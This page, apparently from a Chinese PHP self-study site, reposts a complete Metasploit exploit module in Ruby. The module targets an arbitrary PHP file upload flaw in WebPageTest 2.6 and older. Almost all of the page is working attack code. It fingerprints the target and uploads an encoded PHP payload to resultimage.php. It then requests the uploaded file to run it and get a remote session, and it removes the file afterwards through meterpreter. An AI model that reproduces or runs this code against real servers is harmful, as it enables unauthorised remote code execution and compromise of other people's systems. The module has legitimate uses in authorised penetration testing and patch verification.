网站地图    收藏   

主页 > 后端 > 网站安全 >

WebPageTest任意php文件上传 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] ### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for mor......

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info={})
        super(update_info(info,
            'Name'           => "WebPageTest Arbitrary PHP File Upload",
            'Description'    => %q{
                    This module exploits a vulnerability found in WebPageTest's Upload Feature. By
                default, the resultimage.php file does not verify the user-supplied item before
                saving it to disk, and then places this item in the web directory accessable by
                remote users.  This flaw can be abused to gain remote code execution.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'dun',    #Discovery, PoC
                    'sinn3r'  #Metasploit
                ],
            'References'     =>
                [
                    ['OSVDB', '83822'],
                    ['EDB', '19790']
                ],
            'Payload'        =>
                {
                    'BadChars' => "\x00"
                },
            'DefaultOptions'  =>
                {
                    'ExitFunction' => "none"
                },
            'Platform'       => ['php'],
            'Arch'           => ARCH_PHP,
            'Targets'        =>
                [
                    ['WebPageTest v2.6 or older', {}]
                ],
            'Privileged'     => false,
            'DisclosureDate' => "Jul 13 2012",
            'DefaultTarget'  => 0))
 
            register_options(
                [
                    OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])
                ], self.class)
    end
 
 
    def check
        peer = "#{rhost}:#{rport}"
        target_uri.path << '/' if target_uri.path[-1,1] != '/'
        base = File.dirname("#{target_uri.path}.")
 
        res1 = send_request_raw({'uri'=>"#{base}/index.php"})
        res2 = send_request_raw({'uri'=>"#{base}/work/resultimage.php"})
 
        if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and
           res2 and res2.code == 200
            return Exploit::CheckCode::Vulnerable
        end
 
        return Exploit::CheckCode::Safe
    end
 
 
    def on_new_session(cli)
        if cli.type != "meterpreter"
            print_error("No automatic cleanup for you. Please manually remove: #{@target_path}")
            return
        end
        cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
        cli.fs.file.rm(@target_path)
        print_status("#{@target_path} removed")
    end
 
 
    def exploit
        peer = "#{rhost}:#{rport}"
        target_uri.path << '/' if target_uri.path[-1,1] != '/'
        base = File.dirname("#{target_uri.path}.")
 
        p = payload.encoded
        fname = "blah.php"
        data = Rex::MIME::Message.new
        data.add_part(
            "<?php #{p} ?>",                                   #Data is our payload
            'multipart/form-data',                             #Content Type
            nil,                                               #Transfer Encoding
            "form-data; name=\"file\"; filename=\"#{fname}\""  #Content Disposition
        )
 
        print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
        res = send_request_cgi({
            'method' => 'POST',
            'uri'    => "#{base}/work/resultimage.php",
            'ctype'  => "multipart/form-data; boundary=#{data.bound}",
            'data'   => data.to_s
        })
 
        if not res
            print_error("#{peer} - No response from host")
            return
        end www.2cto.com
 
        @target_path = "#{base}/results/#{fname}"
        print_status("#{peer} - Requesting #{@target_path}")
        res = send_request_cgi({'uri'=>@target_path})
 
        handler
 
        if res and res.code == 404
            print_error("#{peer} - Payload failed to upload")
        end
    end
end

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论